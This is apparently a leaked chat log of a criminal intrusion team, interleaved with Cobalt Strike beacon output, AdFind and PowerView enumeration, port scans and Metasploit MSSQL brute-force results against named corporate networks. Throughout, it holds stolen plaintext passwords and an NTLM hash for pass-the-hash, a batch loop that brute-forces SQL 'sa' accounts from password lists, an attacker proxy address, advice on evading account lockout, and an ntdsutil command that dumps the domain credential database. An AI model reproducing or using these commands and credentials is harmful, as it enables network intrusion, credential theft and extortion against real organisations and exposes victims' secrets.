\JDODC64.jdossn.local/SDPROF - \JDODC64.jdossn.local\Shares - \JDODC64.jdossn.local\SYSVOL - Logon server share [+] received output: \JDOXADCC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC1.jdossn.local\C$ - Default share \JDOXADCC1.jdossn.local\CtxSTShare - \JDOXADCC1.jdossn.local\IPC$ - Remote IPC [+] received output: \SNDMIC61.jdossn.local\ADMIN$ - Remote Admin \SNDMIC61.jdossn.local/APPS - EQUIP APPS Share \SNDMIC61.jdossn.local\AUTO-IT - EQUIP AUTO-IT Share \SNDMIC61.jdossn.local\C$ - Default share \SNDMIC61.jdossn.local\DPM - EQUIP DPM Share \SNDMIC61.jdossn.local/DSJDIS - \SNDMIC61.jdossn.local\EPC - EQUIP EPC Share \SNDMIC61.jdossn.local\EQUIP - EQUIP EQUIP Share \SNDMIC61.jdossn.local/IPC$ - Remote IPC \SNDMIC61.jdossn.local/JDDTF - EQUIP JDDTF Share \SNDMIC61.jdossn.local/SDDigitalSignature - \SNDMIC61.jdossn.local\Units_Data - EQUIP Units_Data Share [+] received output: \\JDOCHOPS12.jdossn.local\ADMIN$ - Remote Admin \JDOCHOPS12.jdossn.local\C$ - Default share \JDOCHOPS12.jdossn.local\E$ - Default share \JDOCHOPS12.jdossn.local\IPC$ - Remote IPC [+] received output: \W0W8987711191.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711191.ndleading.jdossn.local\C$ - Default share \W0W8987711191.ndleading.jdossn.local\dominics - dominics \W0W8987711191.ndleading.jdossn.local\IPC$ - Remote IPC \W0W8987711191.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \W088726121926.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726121926.ndleading.jdossn.local\C$ - Default share \W088726121926.ndleading.jdossn.local\D$ - Default share \W088726121926.ndleading.jdossn.local\IPC$ - Remote IPC \W088726121926.ndleading.jdossn.local\Nic's Printer - Nic's Printer \W088726121926.ndleading.jdossn.local\print$ - Printer Drivers \W0W88726121926.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6 \\W088726121926.ndleading.jdossn.local\Users - [+] received output: \JDOXADCC2.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC2.jdossn.local\C$ 
- Default share \JDOXADCC2.jdossn.local\CtxSTShare - \JDOXADCC2.jdossn.local\IPC$ - Remote IPC [+] received output: \KNDMICEQDB61.jdossn.local\ADMIN$ - Remote Admin \KNDMICEQDB61.jdossn.local\ASAData - \KNDMICEQDB61.jdossn.local\ASALogs - \KNDMICEQDB61.jdossn.local\ASATestData - \KNDMICEQDB61.jdossn.local\Backups - \KNDMICEQDB61.jdossn.local\C$ - Default share \KNDMICEQDB61.jdossn.local\E$ - Default share \KNDMICEQDB61.jdossn.local\F$ - Default share \KNDMICEQDB61.jdossn.local\G$ - Default share \KNDMICEQDB61.jdossn.local\IPC$ - Remote IPC \KNDMICEQDB61.jdossn.local\L$ - Default share \KNDMICEQDB61.jdossn.local\M$ - Default share \KNDMICEQDB61.jdossn.local\MirrorLogs - \KNDMICEQDB61.jdossn.local\P$ - Default share \KNDMICEQDB61.jdossn.localSQLRemote - \KNDMICEQDB61.jdossn.local\T$ - Default share \KNDMICEQDB61.jdossn.local\Temp - ```pth JDOSSN\nddevbernst 5b622ad5d550408ed6260c2b8fb185cc``` dhsawspilot01.jdossn.local [10.99.194.150] W088726121943.ndleading.jdossn.local [10.28.92.159] JDOAWSSUP01.jdossn.local [10.99.207.196] W08987712192.ndleading.jdossn.local [10.29.220.125] `````` [+] received output: \dhsawspilot01.jdossn.local\ADMIN$ - Remote Admin \dhsawspilot01.jdossn.local\C$ - Default share \dhsawspilot01.jdossn.local\E$ - Default share \dhsawspilot01.jdossn.local\IPC$ - Remote IPC [+] received output: \W088726121943.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726121943.ndleading.jdossn.local\C$ - Default share \W088726121943.ndleading.jdossn.local\Caseys - Caseys \W088726121943.ndleading.jdossn.local\D$ - Default share \W088726121943.ndleading.jdossn.local\IPC$ - Remote IPC \W088726121943.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOAWSSUP01.jdossn.local\ADMIN$ - Remote Admin \JDOAWSSUP01.jdossn.local\C$ - Default share \JDOAWSSUP01.jdossn.local\D \JDOAWSSUP01.jdossn.local\D$ - Default share \JDOAWSSUP01.jdossn.local\E$ - Default share \JDOAWSSUP01.jdossn.local\IPC$ - Remote IPC [+] received output: 
\W0W8987712192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987712192.ndleading.jdossn.local\C$ - Default share \W0W8987712192.ndleading.jdossn.local\D$ - Default share \WW08987712192.ndleading.jdossn.local\HP LaserJet Pro MFP M426f-M427f PCL-6 - HP LaserJet Pro MFP M426f-M427f PCL-6 \W0W8987712192.ndleading.jdossn.local\IPC$ - Remote IPC \WW08987712192.ndleading.jdossn.local\MS Publisher Color Printer - MS Publisher Color Printer \W0W8987712192.ndleading.jdossn.local\print$ - Printer Drivers ````AdFind -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn` there's an example belowhttp://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx above from here as in a hurry understood the format DC=server,DC=comkey-b parameter`` shell adfind.exe -f "(objectcategory=person)" -s base > ad_users.txt ``base where do I put it? C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "objectcategory=computer" 1>ad_computers.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. C:\Users\Administrator\Desktop\ping>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program. 
C:\Users\Administrator\Desktop\ping>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 LDAP_BIND: [] Error 0x51 (81) - Server Down Terminating program ``You still have 4 minutes to google if you don't, google if you specify basea adfain won't work under token I wonder? no password length not lockoutaokay analog of net accounts in powerview how to get it?``The other thing)`` Unicode : @{Unicode=yes} SystemAccess : @{RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0} KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1} Version : @{signature="$CHICAGO$"; Revision=1} PrivilegeRights : @{SeBatchLogonRight=System.Object[]; SeLoadDriverPrivilege=*S-1-5-21-742535178-4155275036-2790254320-513} EventAudit : @{AuditDSAccess=1} RegistryValues : Path : \\matches.com\sysvol\matches.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\ MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9} GPODisplayName : Domain - Default Domain Policy ````MATCHES\Louisad M@tches2020!!!` `MATCHES\mercedesd Dinham2323 `in jobs vicito works now made Louise's token, requested DomainPolicy to conf conf8 min for this all-cocken should start.[ ](https://mediaeveryone.com/group/matches?msg=BjGADji9jwnSK3pjt) now doing@tl1 aha, true token domain user tried? authorization vpn goes through radius rather than directly through hell, understand? you're accessing a pc that DOES NOT KNOW about the domain from the context of a user who is NOT in the domain-seek a way to access with the domain tokens in the fuck - OFFICE - give me another 1000 messages why the fuck don't you say something? didn't get it - the office - who got it? no one fucking got it so write 100,000,000 messages here. I already explained that to you. 
why the fuck do i have to go through this again and explain to you now you can't run it from a domain user because your machine isn't joined to a domain+1''. [*] 10/03 18:17:46 - Executing PowerView Get-DomainPolicyData via PowerPick [*] Tasked beacon to run: Get-DomainPolicyData -Domain matches.com (unmanaged) [+] host called home, sent: 133715 bytes [+] received output: ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or ERROR: could not be contacted. ERROR: " ERROR: At line:13117 char:24 ERROR: + else { $Results = $GPOSearcher.FindAll() } ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : COMException ERROR: ``okay, ad_user is shot through powerview fine, why when I shoot DomainPolicy I get ``wrong creeds you have here``? everything is taken off without the credits, there won't be time to think about it in real objects - in real objects there won't be time to think about the fuck you're talking about if i don't see guys writing 100 fucking times what to do and the timer goes to minutes, then it's a fucking analytical problem if there are any questions for me - contact me directlyDiscord takes 5 minutes to postTeamLead1, TeamLead2 - let them all install Discord and share their screens If they're so smart, they can show you "the goods face" in real time and everything will be clear, if only because the standard polisy on the reset is 30 minutes, there will be no lockout ok. whatever check it blindlycall it? ...... if you can go to ldap to remove hell through powerview we with grandfather as we check it out through powerview i wrote above that WE ARE NOT IN THE DOMAIN? is hell removed? we are sitting under a wpn it does not work out does it say anything?) net accounts /dombadpasswordcount oxxxxxxx it's not Blindness from tnt telling the script what's the point of it? 
when the lockout is near it's skipped of course it's skipped of course you use the script to check when autobrouting? fuck. is that even a question? we checked three passwords yesterday yes, we have no way to check the lockout policy of the domain they will not fly into the lock if they check now? the second is to check the LA Credentials data on DIFFERENT groups of servers and APMs - all this is in the AD it makes sense to check it on all domain admins the first thing to do as it is a new pass and it is EXACTLY the technical can try to play with SID play but it is not sure .37 does not stick `` [-] 10.1.4.4:445 - 10.1.4.4:445 - Failed: '.\Administrator:XhY?8WJSI', ``understood, didn't control user8 that it was brute-force, how do we know which groups the machine is in? if we're pulling that from the group policies? changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" ``` this is a clear indication that this is a local user of some PC, and definitely not a service account, I understand that everyone wants to drink beer and have a rest, but let's stop the stupor and productively work off the crumbs of data that are available and not slushkullserver[ ](https://mediaeveryone.com/group/matches?msg=xaeRe2fBZd38i8oFH) . it's not even fucking funny anymore why test this pass on 1433? [-] 10.7.20.30:445 - 10.7.20.30:445 - Failed: '.\Administrator:XhY?8WJSI', ``` ``` [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\Administrator:XhY?8WJSI (Incorrect: ) ``Guys, we're fucking sysadmins after all. we're the ones who should understand the logic of group policies. LA from GPO will be either on specific machines which are in specific groups or on network segments on sid? 
@tl1 make a correction, check the user and server machines belonging to specific sabnetamplet check the dk, skul and a couple of user pktak that may be everywhere know - this is from group policies ``LA where?password for LA XhY?WJSI[ ](https://mediaeveryone.com/group/matches?msg=icgaSNNqbnCtwaMpJ) This is the list of domain comps that the admins have in the balloon40 minutes to google this is longA how long ago did it work?)your task did anyone google it?)it's been 50 minutes)solved?"`` for /f %s in (srv.txt) do @ (echo %s) ``` there should be no error here)))) what do we have? for /f %s in (srv.txt) do @ (echo %s) ``and so add () for the first loop? for /f %s in (srv.txt) do @ for /f %p in (pwd.txt) do @ (osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt) ``Who wrote the batons? ``No, I won't tell you. It's a mystery, I would pay attention to parentheses) but @tl2 did not tell me where the error is, just my assumption that I should add parentheses somewhere else, all is clear? `%p` - a variable from the dictionary of passwords do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt ``Where at the end of it you see 2 loops who can write batiks or code in any language but can make queries in the database under the accesses, it does not search itselfYou have 2 dictionaries - srv.txt, pwd.txt I do not think that it was necessary to explain the first one)`-Q matches.com ?[ ](https://mediaeveryone.com/group/matches?msg=NMnPWq9doKJzA9H6s) but if you think about it? ``` beacon> shell osql.exe -U sa [*] Tasked beacon to run: osql.exe -U sa [+] host called home, sent: 45 bytes [+] received output: Password: ``the question is what to run that everything should be in the same folder right? and just put osql.exe on the dedication and in the same folder with it srv.txt and pwd.txt will form result.txt for a long time? 
[-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA (Incorrect: ) ``PasswordA€'' looks like a broken symbol. PasswordA - try ```. [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: ) [-] 10.10.1.41:61340 - 10.10.1.41:61340 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: ) ``Check another dictionary from @tl2 with the script. 
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:navproject123 (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: ) [-] 10.5.19.37:1433 - 10.5.19.37:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect: ) ``Don't forget this for the brute force, the custom skull port means a different thing``. 
beacon> portscan 10.10.1.41 61340 [*] Tasked beacon to scan ports 61340 on 10.10.1.41 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.10.1.41' is alive. [read 8 bytes] [+] received output: 10.10.1.41:61340 Scanner module is complete ``The second one is closed Check 61340 command + output beacon> portscan 10.10.1.41 [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.10.1.41 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.10.1.41' is alive. [read 8 bytes] 10.10.1.41:5985 10.10.1.41:3389 10.10.1.41:443 10.10.1.41:139 10.10.1.41:135 10.10.1.41:80 10.10.1.41:445 ``` ``` beacon> portscan 10.7.18.36 [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 10.7.18.36 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.7.18.36' is alive. [read 8 bytes] 10.7.18.36:5985 10.7.18.36:3389 10.7.18.36:135 10.7.18.36:80 ``First and last check what portPassword: navproject123``. Pinging FORTICLIENTEMS.matches.com [10.10.1.41] with 32 bytes of data: Reply from 10.10.1.41: bytes=32 time=110ms TTL=121 Reply from 10.10.1.41: bytes=32 time=181ms TTL=121 Reply from 10.10.1.41: bytes=32 time=300ms TTL=121 Reply from 10.10.1.41: bytes=32 time=279ms TTL=121 Ping statistics for 10.10.1.41: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 110ms, Maximum = 300ms, Average = 217ms Pinging EC2AMAZ-U49LCLF.matches.com [10.1.4.4] with 32 bytes of data: Reply from 10.1.4.4: bytes=32 time=112ms TTL=121 Reply from 10.1.4.4: bytes=32 time=112ms TTL=121 Reply from 10.1.4.4: bytes=32 time=202ms TTL=121 Reply from 10.1.4.4: bytes=32 time=180ms TTL=121 Ping statistics for 10.1.4.4: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 112ms, Maximum = 202ms, Average = 151ms Pinging AWS-VPBCSQL03.matches.com [10.5.19.37] with 32 bytes of data: Reply from 10.5.19.37: bytes=32 time=186ms TTL=121 
Reply from 10.5.19.37: bytes=32 time=122ms TTL=121 Reply from 10.5.19.37: bytes=32 time=148ms TTL=121 Reply from 10.5.19.37: bytes=32 time=122ms TTL=121 Ping statistics for 10.5.19.37: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 122ms, Maximum = 186ms, Average = 144ms Pinging AWS-VTBIMSTRI03.matches.com [10.7.18.36] with 32 bytes of data: Reply from 10.7.18.36: bytes=32 time=136ms TTL=121 Reply from 10.7.18.36: bytes=32 time=122ms TTL=121 Reply from 10.7.18.36: bytes=32 time=137ms TTL=121 Reply from 10.7.18.36: bytes=32 time=122ms TTL=121 Ping statistics for 10.7.18.36: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 122ms, Maximum = 137ms, Average = 129ms ``` ``` (ICMP) Target '10.10.1.41' is alive. [read 8 bytes] [+] received output: Scanner module is complete (ICMP) Target '10.1.4.4' is alive. [read 8 bytes] 10.1.4.4:1433 Scanner module is complete (ICMP) Target '10.5.19.37' is alive. [read 8 bytes] 10.5.19.37:1433 Scanner module is complete [+] received output: (ICMP) Target '10.7.18.36' is alive. [read 8 bytes] [+] received output: Scanner module is complete ````MSSQLSvc.matches.com [204.74.99.100]`CREATE LOGIN [Abby] WITH PASSWORD=N'abbyabby', DEFAULT_DATABASE=[master],[ ](https://mediaeveryone.com/group/matches?msg=WHrvRc9wXZ5vuZfsf) yes "SysConnStr"="company=Carpetright UK;server=CSONAVQA01;dbname=CSONAVQA01;user=repl_ho;passwd=admin;|fin|ndbcs@370 "skul ports by the way are listed in the AD again - read the conclusion you like to be more secretive and unnecessarily drop files on the disk, but it makes a lot of noise traffic) for the future - when you scan for anything, check the port you need to check is hardly there dhcp certainlyotping skul again?``` Unable to Connect: ) ``at least I saw myself why didn't you scan it? (ICMP) Target '10.1.4.4' is alive. 
[read 8 bytes] 10.1.4.4:1433 Scanner module is complete ``` ``` (ICMP) Target '10.7.18.36' is alive. [read 8 bytes] [+] received output: Scanner module is complete ``` ``` beacon> portscan 10.7.19.25 1433 [*] Tasked beacon to scan ports 1433 on 10.7.19.25 [+] host called home, sent: 93245 bytes [+] received output: Scanner module is complete ``And more, please send me the port scans to all 3 servers, it was not in the rockyou? for /f %s in (srv.txt) do @ (for /f %p in (pwd.txt) do @ osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result.txt) ``` something like this is possible but there is a mistake somewhere in this command ;- )The dumbest thing on the skulbrut is this above ``` ``` [*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner. [*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner. [*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner. 
[-] 10.1.4.4:1433 - Unable to parse encryption req during pre-login, this may not be a MSSQL server [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Incorrect: ) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08; (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12; (Unable to Connect: ) [*] Scanned 3 of 3 hosts (100% complete) exploit -j [*] Auxiliary module running as background job 1. msf6 auxiliary(scanner/mssql/mssql_login) > [*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner. [*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner. [*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner. 
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Incorrect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Incorrect:) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw08 (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:sapw12 (Unable to Connect: ) [*] Scanned 3 of 3 hosts (100% complete) exploit -j [*] Auxiliary module running as background job 2. msf6 auxiliary(scanner/mssql/mssql_login) [*] 10.7.19.25:1433 - 10.7.19.25:1433 - MSSQL - Starting authentication scanner. [*] 10.1.4.4:1433 - 10.1.4.4:1433 - MSSQL - Starting authentication scanner. [*] 10.7.18.36:1433 - 10.7.18.36:1433 - MSSQL - Starting authentication scanner. 
[-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Incorrect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa: (Unable to Connect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ (Incorrect: ) [-] 10.1.4.4:1433 - 10.1.4.4:1433 - LOGIN FAILED: WORKSTATION\sa:pw08 (Incorrect:) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [*] Scanned 1 of 3 hosts (33% complete) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:Password$ (Unable to Connect: ) [-] 10.7.19.25:1433 - 10.7.19.25:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: ) [-] 10.7.18.36:1433 - 10.7.18.36:1433 - LOGIN FAILED: WORKSTATION\sa:PasswordA€ pw08 (Unable to Connect: ) [*] Scanned 2 of 3 hosts (66% complete) [*] Scanned 3 of 3 hosts (100% complete) ``All 3 servers? all failedPassword$ PasswordA€ pw08 PasswordA€ pw08I also recommend to build your own brute force dictionary for the future, which are not tied to domain, year and server namePassword$ PasswordA€ pw08setg Proxies socks4:104.238.205.128:2282checkablethere is an excellent)in hashes look[ ](https://mediaeveryone.com/group/matches?msg=Af9FsrNjnoLdqp8dG) where is it from?[ ](https://mediaeveryone.com/group/matches?msg=Ht6pTTvpaofN7oE4B) .sa sapw08;@user1 hasn't removed the hash?+sleep + highlighted in yellowSleep good morning and you can all go home and dump that available@user3 session in the coba highlight where the file I'll take samsession in slipriyou get I in the coba uploadsSanja sleep you in the coba uploads? Only you at work? 
I mean, my productivity will be 50% less because I get up at 8 in the morning. And it will be good if only mine.You know what it would be if grandma had a bolt.But if I had archived ...In 4 hours already get up)I know the smaller the date comes out - the better = ) ``We are in no hurry ;`` Then you delete everything after you drop1 eh file into the system, archive it and compress it 577 times in the internet)) there is no archiver in the archive? brrr, it takes about 100mdump waiting to be loaded? no@user3 finished with the dump?golden words, i wholeheartedly support:thinking:let's take it into account and do it differently in the future:face_with_monocle:but in the creds it was necessary to put exactly "short" variant so it happened because yes and EA were needed before getting the session on trustee originally wanted to do so, but then I thought "why the fuck then to get them through addind" and decided that "but maybe it is necessary" and that's how the list of "doc, ea, ok future, I see you from ad users delivered yes and other things, next time in creds.txt just output net group "domain admins" and all)if anything you can from my he said that he has everything sortedMisha leave c360? 
well for all that worked today report, Misha finalized c360[ ](https://mediaeveryone.com/group/saiglobal-com?msg=35agEhdwKYvDpwkSZ) and why 3 domains inside?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vtPCrjfCF2HwvMfKx) nobody read)well in general here and trust was a chore, the next time will be much faster)and all the rest is a matter of time, routine)the hardest was to get into the trustda I also got tired) let's finish, there is not much left) How nice that you with us to win) tomorrow a hard day sleep not, already half an hour should finishNow all night work?do do, now, forgot@user9 where are EA, DA, LA? kerbs separately really kerbs - kerb, the rest hashes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=tm3NpqFRoaH3MFnyd) kerbs - dcsync hashes - kerb? have not arrived yet? i already passed the session so how are you doing with the others? tomorrow from 3:30? +5 servers not distributed leave as is104.238.205.128aha, in the archive and take away in the report beacon> run ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q [*] Tasked beacon to run: ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" q q [+] host called home, sent: 78 bytes [+] received output: ntdsutil: ac in ntds Active instance set to "ntds". ntdsutil: ifm ifm: cr fu c:\windows\temp\abcd Creating snapshot... Snapshot set {30839d3a-489d-4c9e-9a4f-feea14764ebf} generated successfully. Snapshot 